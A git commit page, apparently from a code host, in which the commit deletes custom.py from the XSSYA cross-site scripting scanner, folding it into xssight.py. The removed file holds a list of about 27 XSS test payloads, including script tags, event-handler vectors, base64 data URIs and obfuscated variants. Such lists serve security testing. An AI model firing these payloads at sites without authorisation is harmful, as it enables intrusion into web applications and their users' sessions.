intergrated custom.py into xssight.py
This commit is contained in:
parent
dcee883259
commit
b0dea26b75
42
custom.py
42
custom.py
@ -1,42 +0,0 @@
|
|||||||
#!/usr/bin/env python
|
|
||||||
# -*- coding: cp1252 -*-
|
|
||||||
# XSSA is a Cross Site Scripting Scanner & Vulnerability Confirmation
|
|
||||||
# By Yehia Mamdouh - twitter.com/@Yehia1mamdouh / Facebook/yehia.mamdouh.98
|
|
||||||
|
|
||||||
|
|
||||||
import urllib
|
|
||||||
import re
|
|
||||||
import urllib2
|
|
||||||
|
|
||||||
|
|
||||||
class check:
|
|
||||||
def __init__(self):
|
|
||||||
self.hit = ["<script>alert('XSSYA')</script>",
|
|
||||||
"1<ScRiPt >prompt(962477)</sCripT>",
|
|
||||||
"<script>alert('xssya')</script>",
|
|
||||||
"'';!--\"<XSS>=&{()}",
|
|
||||||
"<ScRipt>ALeRt('xssya');</sCRipT>",
|
|
||||||
"<body/onhashchange=alert(1)><a href=#>clickit",
|
|
||||||
"<img src=x onerror=prompt(1);>",
|
|
||||||
"%3cvideo+src%3dx+onerror%3dprompt(1)%3b%3e",
|
|
||||||
"<iframesrc=\"javascript:alert(2)\">",
|
|
||||||
"<iframe/src=\"data:text/html;	base64
,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\">",
|
|
||||||
"<form action=\"Javascript:alert(1)\"><input type=submit>",
|
|
||||||
"<isindex action=data:text/html, type=image>",
|
|
||||||
"<object data=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=\">",
|
|
||||||
"<svg/onload=prompt(1);>",
|
|
||||||
"<marquee/onstart=confirm(2)>/",
|
|
||||||
"<body onload=prompt(1);>",
|
|
||||||
"<q/oncut=open()>",
|
|
||||||
"<a onmouseover=location=’javascript:alert(1)>click",
|
|
||||||
"<svg><script>alert(/1/)</script>",
|
|
||||||
"</script><script>alert(1)</script>",
|
|
||||||
"<scri%00pt>alert(1);</scri%00pt>",
|
|
||||||
"<scri%00pt>confirm(0);</scri%00pt>",
|
|
||||||
"5\x72\x74\x28\x30\x29\x3B'>rhainfosec",
|
|
||||||
"<isindex action=j	a	vas	c	r	ipt:alert(1) type=image>",
|
|
||||||
"<marquee/onstart=confirm(2)>",
|
|
||||||
"<A HREF=\"http://www.google.com./\">XSS</A>",
|
|
||||||
"<svg/onload=prompt(1);>",]
|
|
||||||
|
|
||||||
|
|
Loading…
x
Reference in New Issue
Block a user